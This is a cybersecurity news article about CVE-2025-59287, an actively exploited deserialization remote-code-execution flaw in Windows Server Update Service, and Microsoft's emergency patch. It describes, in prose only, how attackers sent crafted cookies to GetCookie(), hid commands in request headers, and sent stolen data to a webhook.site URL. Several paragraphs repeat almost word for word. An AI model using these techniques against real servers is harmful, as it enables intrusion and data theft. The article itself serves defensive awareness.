Today's cybersecurity headlines are brought to you by ThreatPerspective

The Critical WSUS Flaw: A Deserialization RCE Vulnerability Under Active Attack

The Critical WSUS Flaw: A Deserialization RCE Vulnerability Under Active Attack
A critical vulnerability in Windows Server Update Service (WSUS) has been reported and is currently under active attack, posing a significant threat to system security. The vulnerability allows an unauthorized attacker to execute code over a network, compromising the security of systems running WSUS. Microsoft has released urgent updates to address this issue and protect affected customers.

October 25, 2025 - In a significant security update, Microsoft has released urgent patches to address the critical WSUS (Windows Server Update Service) RCE (Remote Code Execution) vulnerability, CVE-2025-59287. This vulnerability is currently under active attack, with researchers MEOW and Markus Wulftange of CODE WHITE GmbH reporting the issue.

The WSUS RCE flaw is a deserialization of untrusted data vulnerability that allows an unauthorized attacker to execute code over a network. The issue stems from insecure BinaryFormatter use, which Microsoft deprecated and removed from .NET 9 in 2024 due to inherent security risks. This makes CVE-2025-59287 particularly concerning as it exploits the same insecure binary deserialization mechanism.

According to the US Cybersecurity and Infrastructure Security Agency (CISA), CVE-2025-59287 has been added to its Known Exploited Vulnerabilities catalog, underscoring the severity of this issue. The Dutch National Cyber Security Centre (NCSC) also confirmed attacks in the wild exploiting the vulnerability on October 24, 2025.

Hawktrace researchers published a Proof-of-Concept (PoC) for this vulnerability, which demonstrates how an attacker can achieve remote code execution with SYSTEM privileges by sending malicious encrypted cookies to the GetCookie() endpoint. The Dutch NCSC also confirmed attacks in the wild exploiting the vulnerability CVE-2025-59287 on October 24, 2025.

Researchers from Eye Security reported a Base64 .NET payload at 06:55 UTC that reads the ‘aaaa’ request header and runs it via cmd.exe to hide commands from logs. This was very different from the POC by Hawktrace and shows that the threat actor had capabilities beyond that of a script kiddie.

Cybersecurity firm Huntress detected attackers probing exposed WSUS endpoints (ports 8530/8531) from 2025-10-23 23:34 UTC, sending crafted POSTs that triggered a deserialization RCE. The exploit spawned cmd.exe and PowerShell, downloaded a Base64 PowerShell payload to enumerate systems and exfiltrate data to a webhook.site URL.

Huntress says exploitation may be limited because WSUS isn’t often publicly exposed; Microsoft re-released the patch, and the latest updates protect affected customers. The researchers at Huntress also published Indicators of Compromise for this vulnerability.

Microsoft has released an out-of-band fix for CVE-2025-59287, a critical WSUS RCE flaw (CVSS 9.8) that is under active exploitation. To comprehensively address CVE-2025-59287, Microsoft has released an out of band security update for the following supported versions of Windows Server: Windows Server 2012, Windows Server 2012 R2, Windows Server 2016, Windows Server 2019, Windows Server 2022, Windows Server 2022 23H2 Edition (Server Core installation), and Windows Server 2025. A reboot will be required after installing the updates.

The U.S. CISA added the flaw to its Known Exploited Vulnerabilities catalog and warned that attackers were probing exposed WSUS endpoints, sending crafted POSTs that triggered a deserialization RCE. This indicates that this vulnerability is currently being actively exploited by threat actors.

Researchers MEOW and Markus Wulftange reported the vulnerability to Microsoft. “To comprehensively address CVE-2025-59287, Microsoft has released an out of band security update for the following supported versions of Windows Server: Windows Server 2012, Windows Server 2012 R2, Windows Server 2016, Windows Server 2019, Windows Server 2022, Windows Server 2022 23H2 Edition (Server Core installation), and Windows Server 2025. Note that a reboot will be required after you install the updates,” reads the update published by Microsoft.

The flaw is a deserialization of untrusted data in Windows Server Update Service that allows an unauthorized attacker to execute code over a network. Remote, unauthenticated attackers can trigger unsafe deserialization of AuthorizationCookie objects in the GetCookie() endpoint, leading to RCE with SYSTEM privileges. The issue stems from insecure BinaryFormatter use, which Microsoft deprecated and removed from .NET 9 in 2024 due to inherent security risks.

The researchers at Hawktrace stated that the vulnerability allows an unauthenticated attacker to achieve remote code execution with SYSTEM privileges by sending malicious encrypted cookies to the GetCookie() endpoint. “Permanent mitigation requires replacing BinaryFormatter with secure serialization mechanisms, implementing strict type validation, and enforcing proper input sanitization on all cookie data,” they said.

Researchers from Eye Security reported that a Base64 .NET payload at 06:55 UTC reads the ‘aaaa’ request header and runs it via cmd.exe to hide commands from logs. This was very different from the POC by Hawktrace and shows that the threat actor had capabilities beyond that of a script kiddie.

Cybersecurity firm Huntress detected attackers probing exposed WSUS endpoints (ports 8530/8531) from 2025-10-23 23:34 UTC, sending crafted POSTs that triggered a deserialization RCE. The exploit spawned cmd.exe and PowerShell, downloaded a Base64 PowerShell payload to enumerate systems and exfiltrate data to a webhook.site URL.

Huntress says exploitation may be limited because WSUS isn’t often publicly exposed; Microsoft re-released the patch, and the latest updates protect affected customers. The researchers at Huntress also published Indicators of Compromise for this vulnerability.